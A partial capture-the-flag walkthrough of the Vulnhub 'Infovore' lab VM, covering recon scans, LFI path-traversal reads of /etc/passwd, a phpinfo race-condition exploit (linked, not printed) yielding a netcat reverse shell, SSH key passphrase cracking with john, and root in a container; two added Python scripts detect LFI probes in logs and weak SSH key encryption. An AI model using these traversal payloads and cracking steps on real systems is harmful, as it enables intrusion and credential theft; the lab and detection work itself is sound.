
Vulnhub Infovore Vulnhub Walkthrough (Partial)

Posted: 2022-11-09 16:33:37

Infovore Vulnhub

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.63.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:3b:85:70      1      60  PCS Systemtechnik GmbH
 192.168.56.166  08:00:27:79:fd:9d      1      60  PCS Systemtechnik GmbH

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.166.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.166 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 02:06 EST
Nmap scan report for bogon (192.168.56.166)
Host is up (0.000094s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Include me ...
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:79:FD:9D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds

Get Access

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ curl http://192.168.56.166/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.166 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.166
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/09 02:08:25 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.166/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.166/css/]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.56.166/vendor/]
/server-status        (Status: 403) [Size: 279]
Progress: 218349 / 220561 (99.00%)
===============================================================
2022/11/09 02:09:07 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.166
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              sh,php,txt,html
[+] Timeout:                 10s
===============================================================
2022/11/09 02:09:18 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 4674]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 4743]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.166/img/]
/info.php             (Status: 200) [Size: 69802]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.166/css/]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.56.166/vendor/]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102635 / 1102805 (99.98%)
===============================================================
2022/11/09 02:13:23 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ dirb http://192.168.56.166

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Nov  9 02:15:33 2022
URL_BASE: http://192.168.56.166/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.166/ ----
==> DIRECTORY: http://192.168.56.166/css/
==> DIRECTORY: http://192.168.56.166/img/
+ http://192.168.56.166/index.html (CODE:200|SIZE:4674)
+ http://192.168.56.166/index.php (CODE:200|SIZE:4743)
+ http://192.168.56.166/info.php (CODE:200|SIZE:69868)
+ http://192.168.56.166/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.166/vendor/

---- Entering directory: http://192.168.56.166/css/ ----

---- Entering directory: http://192.168.56.166/img/ ----

---- Entering directory: http://192.168.56.166/vendor/ ----
==> DIRECTORY: http://192.168.56.166/vendor/jquery/

---- Entering directory: http://192.168.56.166/vendor/jquery/ ----

-----------------
END_TIME: Wed Nov  9 02:15:44 2022
DOWNLOADED: 23060 - FOUND: 4

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ curl http://192.168.56.166/info.php  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
th {position: sticky; top: 0; background: inherit;}
h1 {font-size: 150%;}

Both index.html and index.php exist. Could there be a local file inclusion? Fuzz index.php to see which parameter name it accepts.

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ wfuzz -c -u http://192.168.56.166/index.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 382
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.166/index.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================


Total time: 3.665230
Processed Requests: 4713
Filtered Requests: 4713
Requests/sec.: 1285.867

                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ wfuzz -c -u http://192.168.56.166/?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 382 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.166/?FUZZ=../../../../../../etc/passwd
Total requests: 4713

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================


Total time: 0
Processed Requests: 4713
Filtered Requests: 4713
Requests/sec.: 0

                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ wfuzz -c -u http://192.168.56.166/index.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 382 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.166/index.php?FUZZ=../../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000025370:   200        7 L      9 W        80 Ch       "filename"
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 72.24588
Processed Requests: 30224
Filtered Requests: 30223
Requests/sec.: 418.3490


Worth noting: the parameter was only found after switching to a different wordlist.

Confirm manually:

http://192.168.56.166/index.php?filename=/etc/passwd
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ curl http://192.168.56.166/index.php?filename=/etc/passwd
<html>
<title>Include me ...</title>
<body>
<p>
<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
</pre></p>
</body>
</html>
                       

Note that with extra ../ levels (../../../../../etc/passwd) the response is empty rather than an error.

But only this one file, /etc/passwd, can be read; other files cannot.

http://192.168.56.166/index.php?filename=php://filter/convert.base64-encode/resource=index

This filter wrapper does not work either, so the source code of the file cannot be read.
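From the defender's side, everything done against this box so far (parameter fuzzing with traversal strings, the direct /etc/passwd read, the php://filter attempt and the discovery of info.php) leaves distinctive entries in the Apache access log. The script below is an added example and not part of this write-up: it parses combined-format log lines and flags those indicators per client. The log lines inside it are constructed to mirror the requests above, and the PHPINFO_PATHS set and the "200 on a sensitive path" heuristic are assumptions.

```python
"""Flag LFI probes and phpinfo exposure in Apache access logs.

Added example, not part of the original write-up. SAMPLE_LOG is constructed
to mirror the requests made against the Infovore box (wfuzz parameter
fuzzing, a direct /etc/passwd read, a php://filter attempt, and a hit on
info.php) in Apache "combined" log format.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# client ident user [time] "method target protocol" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)'
)

TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')
SENSITIVE_PATHS = ('/etc/passwd', '/etc/shadow', '/proc/self/environ', '/var/log/')
PHP_WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip)://', re.IGNORECASE)
# Assumption: the phpinfo page names to watch for in this environment.
PHPINFO_PATHS = {'/info.php', '/phpinfo.php'}


def classify_request(target: str) -> list:
    """Return indicator labels for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    if unquote(parts.path) in PHPINFO_PATHS:
        findings.append('phpinfo-exposed')
    # parse_qsl already percent-decodes once; unquote again to catch double encoding.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote(value)
        if TRAVERSAL_RE.search(decoded):
            findings.append(f'traversal:{name}')
        if any(p in decoded for p in SENSITIVE_PATHS):
            findings.append(f'sensitive-path:{name}')
        if PHP_WRAPPER_RE.match(decoded):
            findings.append(f'php-wrapper:{name}')
    return findings


def scan_log(lines):
    """Yield (client, status, target, findings) for every request that trips an indicator."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        findings = classify_request(m.group('target'))
        if findings:
            yield m.group('client'), int(m.group('status')), m.group('target'), findings


def summarize(lines) -> dict:
    """Aggregate hits per client. A 200 on a sensitive-path probe is counted as a
    likely successful read; an empty include also answers 200 (as seen on this
    box with extra ../ levels), so treat it as a triage signal, not proof."""
    report = {}
    for client, status, target, findings in scan_log(lines):
        entry = report.setdefault(client, {'hits': 0, 'likely_reads': 0, 'labels': set()})
        entry['hits'] += 1
        entry['labels'].update(f.split(':', 1)[0] for f in findings)
        if status == 200 and any(f.startswith('sensitive-path') for f in findings):
            entry['likely_reads'] += 1
    return report


# Constructed sample log lines (not captured from the real box).
SAMPLE_LOG = [
    '192.168.56.137 - - [09/Nov/2022:02:08:25 -0500] "GET /info.php HTTP/1.1" 200 69802 "-" "gobuster/3.2.0-dev"',
    '192.168.56.137 - - [09/Nov/2022:02:20:11 -0500] "GET /index.php?filename=../../../../../../etc/passwd HTTP/1.1" 200 80 "-" "Wfuzz/3.1.0"',
    '192.168.56.137 - - [09/Nov/2022:02:21:40 -0500] "GET /index.php?filename=/etc/passwd HTTP/1.1" 200 1420 "-" "curl/7.85.0"',
    '192.168.56.137 - - [09/Nov/2022:02:22:05 -0500] "GET /index.php?filename=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 80 "-" "curl/7.85.0"',
    '192.168.56.137 - - [09/Nov/2022:02:22:06 -0500] "GET /css/style.css HTTP/1.1" 200 2048 "-" "curl/7.85.0"',
    '10.0.0.5 - - [09/Nov/2022:03:00:00 -0500] "GET /index.php?filename=..%2F..%2Fetc%2Fshadow HTTP/1.1" 403 279 "-" "python-requests/2.28"',
]

if __name__ == '__main__':
    for client, entry in summarize(SAMPLE_LOG).items():
        print(client, entry['hits'], entry['likely_reads'], sorted(entry['labels']))
```

Run against a real access log by passing the open file to summarize(); a client that trips both phpinfo-exposed and sensitive-path is the pattern that led to the shell on this box, and the phpinfo page itself should simply not be reachable on a production host.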

The target's vulnerability here is the exposed info.php (phpinfo) combined with the LFI; see the following article:

https://rafalharazinski.gitbook.io/security/other-web-vulnerabilities/local-remote-file-inclusion/phpinfo-log-race-condition

In that script, change phpinfo.php to info.php and the parameter name to filename, and a shell is obtained:

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.166] 44473
Linux e71b67461f6c 3.16.0-6-amd64 #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) x86_64 GNU/Linux
 15:53:02 up 49 min,  0 users,  load average: 2.80, 0.58, 0.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

$ bash -i
www-data@e71b67461f6c:/$ cd /var/www/html
cd /var/www/html
www-data@e71b67461f6c:/var/www/html$ ls
ls
css
gulpfile.js
img
index.html
index.php
info.php
package-lock.json
package.json
scss
vendor
www-data@e71b67461f6c:/var/www/html$ ls -alh
ls -alh
total 312K
drwxrwxrwx 6 www-data www-data 4.0K Jun 22  2020 .
drwxr-xr-x 5 root     root     4.0K Jun 22  2020 ..
-r--r--r-- 1 root     root       42 Jun 22  2020 .user.txt
drwxr-xr-x 2 root     root     4.0K Apr 27  2020 css
-rw-r--r-- 1 root     root     2.5K Sep 16  2019 gulpfile.js
drwxr-xr-x 2 root     root     4.0K Apr 27  2020 img
-rw-r--r-- 1 root     root     4.6K Sep 16  2019 index.html
-rw-r--r-- 1 root     root      416 Jun  1  2020 index.php
-rw-r--r-- 1 root     root       19 Apr 26  2020 info.php
-rw-r--r-- 1 root     root     257K Sep 16  2019 package-lock.json
-rw-r--r-- 1 root     root     1.3K Sep 16  2019 package.json
drwxr-xr-x 2 root     root     4.0K Apr 27  2020 scss
drwxr-xr-x 4 root     root     4.0K Sep 16  2019 vendor
www-data@e71b67461f6c:/var/www/html$ cat .user.txt
cat .user.txt
FLAG{Now_You_See_phpinfo_not_so_harmless}
www-data@e71b67461f6c:/var/www/html$ hostname
hostname
e71b67461f6c
www-data@e71b67461f6c:/var/www/html$ cd /
cd /
www-data@e71b67461f6c:/$ ls -alh
ls -alh
total 464K
drwxr-xr-x 74 root root 4.0K Jun 23  2020 .
drwxr-xr-x 74 root root 4.0K Jun 23  2020 ..
-rwxr-xr-x  1 root root    0 Jun 22  2020 .dockerenv
-rw-r--r--  1 root root 1.2K Apr 27  2020 .oldkeys.tgz
drwxr-xr-x  2 root root 4.0K Jun  9  2020 bin
drwxr-xr-x  2 root root 4.0K May  2  2020 boot
-rw-------  1 root root 388K Jun 22  2020 core
drwxr-xr-x  5 root root  360 Nov  9 15:03 dev
drwxr-xr-x 63 root root 4.0K Jun 22  2020 etc
drwxr-xr-x  2 root root 4.0K May  2  2020 home
drwxr-xr-x 13 root root 4.0K Jun  9  2020 lib
drwxr-xr-x  2 root root 4.0K Jun  7  2020 lib64
drwxr-xr-x  2 root root 4.0K Jun  7  2020 media
drwxr-xr-x  2 root root 4.0K Jun  7  2020 mnt
drwxr-xr-x  2 root root 4.0K Jun  7  2020 opt
dr-xr-xr-x 95 root root    0 Nov  9 15:03 proc
drwx------  4 root root 4.0K Jun 23  2020 root
drwxr-xr-x  6 root root 4.0K Jun 22  2020 run
drwxr-xr-x  2 root root 4.0K Jun  9  2020 sbin
drwxr-xr-x  2 root root 4.0K Jun  7  2020 srv
dr-xr-xr-x 13 root root    0 Nov  9 15:03 sys
drwxrwxrwt  2 root root 4.0K Nov  9 15:53 tmp
drwxr-xr-x 41 root root 4.0K Jun 22  2020 usr
drwxr-xr-x 31 root root 4.0K Jun 22  2020 var
www-data@e71b67461f6c:/$ 

The first flag is obtained.

.oldkeys.tgz catches our attention; copy it into the web root so it can be downloaded to the local Kali Linux machine.

Privilege escalation

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ tar -xzvf oldkeys.tgz
root
root.pub

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ ls
exploit.py  nmap_full_scan  oldkeys.tgz  root  root.pub

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ ssh2john root > root_hash

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ ls
exploit.py  nmap_full_scan  oldkeys.tgz  root  root_hash  root.pub

┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt root_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
choclate93       (root)
1g 0:00:00:03 DONE (2022-11-09 02:58) 0.2832g/s 2581Kp/s 2581Kc/s 2581KC/s choclatedrop..choclate76
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The passphrase of the private key is cracked.
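The cost lines in john's output ("KDF/cipher ... is 0", i.e. MD5/AES, and "iteration count is 1") explain why the crack took three seconds: this is a legacy PEM key whose passphrase is stretched by a single MD5 pass, so a wordlist runs at millions of guesses per second. The checker below is an added example and not part of this write-up; it tells legacy PEM keys apart from openssh-key-v1 keys and reports the KDF and bcrypt round count, so weak keys can be found and re-encrypted with ssh-keygen -p -o -a <rounds> before they end up in a backup archive like .oldkeys.tgz. Its sample keys are constructed header fragments rather than real key material, and the 16-round threshold is an assumption matching ssh-keygen's default.

```python
"""Classify how an SSH private key file is protected.

Added example, not from the original write-up. Separates legacy PEM keys
(passphrase stretched by OpenSSL EVP_BytesToKey: one MD5 pass) from
openssh-key-v1 keys (bcrypt KDF with a configurable round count) and gives a
weak/strong verdict. Sample keys are constructed headers, not real key material.
"""
import base64
import struct

OPENSSH_MAGIC = b'openssh-key-v1\x00'
MIN_BCRYPT_ROUNDS = 16  # assumption: ssh-keygen's default for -a


def _read_string(buf: bytes, offset: int):
    """Read one SSH wire-format string (uint32 big-endian length prefix)."""
    (length,) = struct.unpack('>I', buf[offset:offset + 4])
    start = offset + 4
    return buf[start:start + length], start + length


def _ssh_string(data: bytes) -> bytes:
    return struct.pack('>I', len(data)) + data


def classify_ssh_key(pem_text: str) -> dict:
    """Return format, cipher, KDF, rounds and a weak/strong verdict for a private key."""
    lines = [line.strip() for line in pem_text.strip().splitlines()]
    if not lines or not lines[0].startswith('-----BEGIN '):
        raise ValueError('not a PEM-style private key')
    if lines[0] == '-----BEGIN OPENSSH PRIVATE KEY-----':
        body = base64.b64decode(''.join(lines[1:-1]))
        if not body.startswith(OPENSSH_MAGIC):
            raise ValueError('bad openssh-key-v1 magic')
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(body, off)
        kdf, off = _read_string(body, off)
        kdfopts, off = _read_string(body, off)
        rounds = None
        if kdf == b'bcrypt':
            _salt, pos = _read_string(kdfopts, 0)   # kdfoptions = string salt, uint32 rounds
            (rounds,) = struct.unpack('>I', kdfopts[pos:pos + 4])
        encrypted = cipher != b'none'
        weak = (not encrypted) or kdf != b'bcrypt' or rounds < MIN_BCRYPT_ROUNDS
        return {'format': 'openssh-v1', 'encrypted': encrypted, 'cipher': cipher.decode(),
                'kdf': kdf.decode(), 'rounds': rounds, 'weak': weak}
    # Legacy PEM (RSA/DSA/EC PRIVATE KEY): encryption is signalled by Proc-Type/DEK-Info
    # headers and the key is derived by EVP_BytesToKey, a single MD5 pass over the passphrase.
    encrypted = any(line.startswith('Proc-Type:') and 'ENCRYPTED' in line for line in lines)
    cipher = None
    for line in lines:
        if line.startswith('DEK-Info:'):
            cipher = line.split(':', 1)[1].strip().split(',')[0]
    return {'format': 'legacy-pem', 'encrypted': encrypted, 'cipher': cipher,
            'kdf': 'md5-evp-bytestokey' if encrypted else None,
            'rounds': 1 if encrypted else None, 'weak': True}


def build_openssh_header(cipher: bytes, kdf: bytes, rounds: int) -> str:
    """Construct only the openssh-key-v1 header (magic, cipher, kdf, kdfoptions, nkeys)
    for testing; a real key continues with the public key and the private section."""
    kdfopts = _ssh_string(b'\x00' * 16) + struct.pack('>I', rounds) if kdf == b'bcrypt' else b''
    body = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack('>I', 1))
    return ('-----BEGIN OPENSSH PRIVATE KEY-----\n' + base64.b64encode(body).decode()
            + '\n-----END OPENSSH PRIVATE KEY-----\n')


# Constructed samples (no real key material).
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

MIIEowIBAAKCAQEAplaceholder
-----END RSA PRIVATE KEY-----
"""
OPENSSH_BCRYPT = build_openssh_header(b'aes256-ctr', b'bcrypt', 16)
OPENSSH_UNENCRYPTED = build_openssh_header(b'none', b'none', 0)

if __name__ == '__main__':
    for name, key in [('legacy', LEGACY_ENCRYPTED), ('bcrypt', OPENSSH_BCRYPT),
                      ('plain', OPENSSH_UNENCRYPTED)]:
        print(name, classify_ssh_key(key))
```

Pointing classify_ssh_key() at the contents of each file under ~/.ssh (or at keys pulled out of backup archives) gives a quick inventory; anything reported as legacy-pem or with too few bcrypt rounds is a candidate for ssh-keygen -p -o, and, as this box shows, a key passphrase should never double as an account password.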

This passphrase is also the password of the root user inside the container.

www-data@e71b67461f6c:/var/www/html$ su - root
su - root
Password: choclate93
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 24K
drwx------  4 root root 4.0K Jun 23  2020 .
drwxr-xr-x 75 root root 4.0K Nov  9 15:56 ..
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Jun 23  2020 .ssh
-r--------  1 root root   79 Jun 22  2020 root.txt
cat root.txt
FLAG{Congrats_on_owning_phpinfo_hope_you_enjoyed_it}

And onwards and upwards!

But up to this point we are still inside the container.

From: https://www.cnblogs.com/jason-huawen/p/16874237.html
